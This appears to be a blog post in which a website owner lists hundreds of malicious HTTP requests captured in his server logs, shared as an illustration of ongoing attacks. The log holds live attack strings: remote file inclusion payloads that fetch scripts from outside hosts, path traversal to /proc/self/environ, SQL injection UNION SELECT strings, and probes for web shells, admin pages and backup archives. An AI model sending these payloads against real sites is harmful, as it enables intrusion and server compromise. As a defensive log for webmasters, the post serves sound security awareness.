Hacking Attempt Examples Received on My Website

Image by The U.S. Army via Flickr

Over the past few months I've noticed various hacking attempts that come in spurts. I always review each of these and adjust my site to maintain protection. However, the malicious and persistent penetration attempts continue. Most originate in China but others are from South America, Eastern Europe, and Russia.

Just for interest, I thought that I would post a list of unique requests that my site receives. I extracted the list below from April 2010 to present, and included the URL requests only.

What surprised me is that for these past 4 months, I received 299 unique requests. However, in reality, the person on the other end issued multiple requests, sometimes spanning several days.


If you read the list below, you will notice that most attempt to take advantage of PHP. Others try Wordpress, perl, graphic images, logfiles, javascript, etc.

I'm sure that my experiences are not alone. If you maintain a website and can review your log files, you may observe similar attempts to violate your site.

Maintaining website security often turns into a full time job. But if you want to keep your site up and running, it is time well spent!

                                    Example URL Requests                                      

GET /%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1

GET /%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//s1.txt??????? HTTP/1.1

GET /.svn/entries HTTP/1.1

GET //*?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1

GET ///?_PHPLIB[libdir]=http://dancingforcancer.com///g466/sc1?? HTTP/1.1

GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1

GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.babywaves.com//a/pid?? HTTP/1.1

GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//s1.txt??????? HTTP/1.1

GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1

GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1

GET //admin/includes/stylesheet.css HTTP/1.1

GET //b2b/admin/includes/stylesheet.css HTTP/1.1

GET //cart/admin/includes/stylesheet.css HTTP/1.1

GET //catalog/admin/includes/stylesheet.css HTTP/1.1

GET //ecommerce/admin/includes/stylesheet.css HTTP/1.1

GET //eshop/admin/includes/stylesheet.css HTTP/1.1

GET //forum/adminLogin.php?config[forum_installed]=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1

GET //games.php?id=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1

GET //javascript:homeClicked() HTTP/1.1

GET //javascript:megamillionsClicked() HTTP/1.1

GET //javascript:powerballClicked() HTTP/1.1

GET //javascript:showPage2( HTTP/1.1,

GET //javascript:showPageScroll( HTTP/1.1,

GET //javascript:window.external.AddFavorite(url, 404 -

GET //main.php?pageURL=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1,

GET //main.php?pageURL=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1,

GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1

GET //myadmin/main.php HTTP/1.1

GET //NukeNews/ HTTP/1.1

GET //op.php HTTP/1.1

GET //pma/main.php HTTP/1.1

GET //public/admin/includes/stylesheet.css HTTP/1.1

GET //shop/admin/includes/stylesheet.css HTTP/1.1

GET //shops/admin/includes/stylesheet.css HTTP/1.1

GET //themes/NukeNews/ HTTP/1.1

GET //zc/admin/includes/stylesheet.css HTTP/1.1

GET //ZEN/admin/includes/stylesheet.css HTTP/1.1

GET //zencart/admin/includes/stylesheet.css HTTP/1.1

GET //zen-cart/admin/includes/stylesheet.css HTTP/1.1

GET //zshop/admin/includes/stylesheet.css HTTP/1.1

GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0 HTTP/1.1

GET /admin/ HTTP/1.1

GET /administrator/index.php/ HTTP/1.1

GET /administrator/index.php?option=com_config HTTP/1.1

GET /apple-touch-icon.png HTTP/1.1

GET /awstat/awstats.pl HTTP/1.1

GET /awstats.pl HTTP/1.1

GET /awstats/awstats.pl HTTP/1.1

GET /awstats/cgi-bin/awstats.pl HTTP/1.1

GET /awstats6/awstats.pl HTTP/1.1

GET /awstats6/cgi-bin/awstats.pl HTTP/1.1

GET /awstats-cgi/awstats.pl HTTP/1.1

GET /backup/administrator/index.php HTTP/1.1

GET /backup/wp-login.php HTTP/1.1

GET /bak.php HTTP/1.1

GET /blog/backup/wp-login.php HTTP/1.1

GET /blog/wp/wp-login.php HTTP/1.1

GET /blog/wp-login.php HTTP/1.1

GET /blog-old/wp-login.php HTTP/1.1

GET /cgi/awstats.pl HTTP/1.1

GET /cgi-bin/cgihelper.pl HTTP/1.1

GET /cgi-bin/redir.cgi?key=lilou HTTP/1.1

GET /CMS/administrator/index.php HTTP/1.1

GET /cms/wp-login.php HTTP/1.1

GET /cms_old/administrator/index.php HTTP/1.1

GET /content/administrator/index.php HTTP/1.1

GET /copyspeed=pausespeed HTTP/1.1

GET /cp/awstats/awstats.pl HTTP/1.1

GET /cvlyfaisunzip.php HTTP/1.1

GET /dphmwww.rar HTTP/1.1

GET /editors/fckeditor/editor/filemanager/upload/php/ajbcupload.php?Type=Media HTTP/1.1

GET /eljbbak.php HTTP/1.1

GET /en/administrator/index.php HTTP/1.1

GET /engine/engine.php HTTP/1.1

GET /engine/engine.php HTTP/1.1

GET /exchange.php?catid=2&cn=Dating//forum/adminLogin.php?config[forum_installed]=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1

GET /exchange.php?catid=http://217.218.225.2:2082/index.html? HTTP/1.1

GET /expandedOdds//*?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1

GET /expandedOdds/US_MM_expanded.htm//*?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1

GET /expandedOdds/US_PB_expanded.htm///index.php?_SERVER[DOCUMENT_ROOT]=http://www.babywaves.com//a/pid?? HTTP/1.1

GET /faisun_unzip.php HTTP/1.1

GET /faisun_zip.php HTTP/1.1

GET /faisununzip.php HTTP/1.1

GET /faisunzip.php HTTP/1.1

GET /fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%252F HTTP/1.1

GET /fckeditor/editor/filemanager/upload/php/cfbmfilename=upload.php?Type=Media HTTP/1.1

GET /fckeditor/editor/filemanager/upload/php/filename=upload.php?Type=Media HTTP/1.1

GET /feed.php/ HTTP/1.1

GET /fhbdfaisun_zip.php HTTP/1.1

GET /FKCeditor/editor/filemanager/upload/php/filename=upload.php?Type=Media HTTP/1.1

GET /FKCeditor/editor/filemanager/upload/php/jonhfilename=upload.php?Type=Media HTTP/1.1

GET /function.mysql-connect HTTP/1.0

GET /games.php//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1

GET /games.php//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1

GET /games.php//games.php?id=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1

GET /get_orders_list.php HTTP/1.1

GET /gjhgwwwroot.rar HTTP/1.1

GET /hekxzip.php HTTP/1.1

GET /horoscopes.php%20%20//modules/horoscope/footer.php?xoopsConfig[root_path]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1

GET /IL HTTP/1.1

GET /images.rar HTTP/1.1

GET /images.zip HTTP/1.1

GET /images/dwogtax.php HTTP/1.1

GET /images/grgyp.html HTTP/1.1

GET /images/info HTTP/1.1

GET /images/jhtp404.php HTTP/1.1

GET /images/kbmvzencart.php HTTP/1.1

GET /images/kmfhunzip.php3.php HTTP/1.1

GET /images/kpuaiporder1.php HTTP/1.1

GET /images/kziwwebshell.php HTTP/1.1

GET /images/mpggphpinfo.php HTTP/1.1

GET /images/NC_outline.gif HTTP/1.1

GET /images/ngkjphpshell.php HTTP/1.1

GET /images/nnwgzip.php HTTP/1.1

GET /images/nqiimy.php HTTP/1.1

GET /images/ohnnzencart1.php HTTP/1.1

GET /images/oqepinfo HTTP/1.1

GET /images/p.html HTTP/1.1

GET /images/qaerip.php HTTP/1.1

GET /images/qgovunzip.php HTTP/1.1

GET /images/qmlwzip.php3.php HTTP/1.1

GET /images/qokainc.php HTTP/1.1

GET /images/qruw1314.php HTTP/1.1

GET /images/qzhgweb.php HTTP/1.1

GET /images/reaf2009.php HTTP/1.1

GET /images/sooj12.php HTTP/1.1

GET /images/uvyhshell.php HTTP/1.1

GET /images/wikimedia-button.png HTTP/1.1

GET /images/wjgwadmin.php HTTP/1.1

GET /images/zvzeadd.php HTTP/1.1

GET /imgs/custom-space.gif HTTP/1.1

GET /index.php?page=http://gosi.lec.co.kr/DB//skin_shop/standard/3_plugin_twindow/myid.jpg?? HTTP/1.1

GET /index.php?page=http://www.4ceda.org/xsml.jpg? HTTP/1.1

GET /InternedData10 HTTP/1.0

GET /iphone/ HTTP/1.1

GET /j/administrator/index.php HTTP/1.1

GET /javascript:homeClicked() HTTP/1.1

GET /javascript:lotto649Clicked() HTTP/1.1

GET /javascript:megamillionsClicked() HTTP/1.1

GET /javascript:powerballClicked() HTTP/1.1

GET /javascript:showPage2(%20 HTTP/1.1

GET /javascript:showPageScroll(%20 HTTP/1.1

GET /javascript:super7Clicked() HTTP/1.1,

GET /jcwdimages.zip HTTP/1.1,

GET /joom/administrator/index.php HTTP/1.1,

GET /joomla/administrator/index.php HTTP/1.1,

GET /joomla_old/administrator/index.php HTTP/1.1

GET /joomla1.5/administrator/index.php HTTP/1.1

GET /joomla1/administrator/index.php HTTP/1.1

GET /joomla15/administrator/index.php HTTP/1.1

GET /joomla2/administrator/index.php HTTP/1.1

GET /jxgeweb.rar HTTP/1.1

GET /kqfyunzip.php HTTP/1.1

GET /links.htm%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1

GET /links.htm%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//s1.txt??????? HTTP/1.1

GET /llucwww.zip HTTP/1.1

GET /m/ HTTP/1.0

GET /main/administrator/index.php HTTP/1.1

GET /mobi/ HTTP/1.1

GET /mobile/headline.htm HTTP/1.1

GET /mobile/home.php HTTP/1.1

GET /mobile/l HTTP/1.1

GET /mobile/this.value HTTP/1.1

GET /mobile/this.value%22 HTTP/1.1

GET /moreinfo/index.php HTTP/1.0

GET /myunzip.php HTTP/1.1

GET /myzip.php HTTP/1.1

GET /ngleweb.zip HTTP/1.1

GET /old/wp-login.php HTTP/1.1

GET /oqwwshenbin.zip HTTP/1.1

GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0

GET /portal/administrator/index.php HTTP/1.1

GET /rkizmyzip.php HTTP/1.1

GET /server-status HTTP/1.1

GET /shenbin.zip HTTP/1.1

GET /Site/administrator/index.php HTTP/1.1

GET /Site_old/administrator/index.php HTTP/1.1

GET /sites/all/README.txt/ HTTP/1.1

GET /stat/awstats.pl HTTP/1.1

GET /statistic/awstats.pl HTTP/1.1

GET /statistics/awstats.pl HTTP/1.1

GET /stats/cgi-bin/awstats.pl HTTP/1.1

GET /store_gc_autoanything.php?gccid=6060777 HTTP/1.1,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

GET /store_gc_autoanything.php?gccid=6060777%20and%201=2%20union%20select%20CONCAT(0x27,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1, 404 -

GET /store_gc_AutoAnything.php?gccid=6060893 HTTP/1.0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

GET /store_gc_AutoAnything.php?gccid=6103341%20%20//main.php?pageURL=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1

GET /store_gc_eBags.php%253Fgccid%253D8189197//main.php?pageURL=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1

GET /store_gc_eBags.php?gccid=5162395&gcp=7/index.php?page=http://www.4ceda.org/xsml.jpg? HTTP/1.1

GET /store_gc_eBags.php?gccid=8189197%20%20//main.php?pageURL=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1

GET /store_gc_everythingfurniture.php?gccid=7002820%20and%201=2%20union%20select%20CONCAT(0x27,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1, 404 -,,,,,,,,,,,,,,,,,,,,,,,,,,,,

GET /store_gc_proboardshop.php?gccid=5873595%20and%201=2%20union%20select%20CONCAT(0x27,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1, 404 -,,,,

GET /store_overstock.php?gccid=http://www.capefearcoast.com/resources/pdfs/dmc.txt? HTTP/1.1

GET /system-cgi/awstats.pl HTTP/1.1

GET /templates/ HTTP/1.1

GET /test/administrator/index.php HTTP/1.1

GET /theme/iamsdp/imgs/khmer-header.png HTTP/1.1

GET /theme/iamsdp/imgs/sign_p.png HTTP/1.1

GET /thilfaisununzip.php HTTP/1.1

GET /typo3/index.php/ HTTP/1.1

GET /typolight/index.php/ HTTP/1.1

GET /unzip.php HTTP/1.1,

GET /url, 404 -

GET /URL HTTP/1.1,

GET /v1/administrator/index.php HTTP/1.1

GET /v2/administrator/index.php HTTP/1.1

GET /vehzfaisun_unzip.php HTTP/1.1

GET /w3c/p3p.xml HTTP/1.1

GET /web.rar HTTP/1.1

GET /web.zip HTTP/1.1

GET /web/administrator/index.php HTTP/1.1

GET /webstats/awstats.pl HTTP/1.1

GET /wordpress/wp-login.php HTTP/1.1

GET /wordpress2/wp-login.php HTTP/1.1

GET /WP/wp-login.php HTTP/1.1

GET /wp-admin/ HTTP/1.1

GET /wp-comments-post.php HTTP/1.0

GET /wp-login.php HTTP/1.1

GET /www.rar HTTP/1.1

GET /www.zip HTTP/1.1

GET /wwwroot.rar HTTP/1.1

GET /wwwroot.zip HTTP/1.1

GET /ybtewwwroot.zip HTTP/1.1

GET /yzmqimages.rar HTTP/1.1

GET /zip.php HTTP/1.1

GET /zsmcmyunzip.php HTTP/1.1

HEAD /phpmyadmin/scripts/setup.php HTTP/1.1

HEAD /urllist.txt? HTTP/1.0

POST /administrator/index.php HTTP/1.1

POST /index.php?action=linkadded HTTP/1.1

Related articles by Zemanta

• 10 life-saving PHP snippets (catswhocode.com)
• Nagios community site is hacked (sucuri.net)
• Security talk: Fortifying your Joomla! website (slideshare.net)
• Defending Against Application DoS attacks (slideshare.net)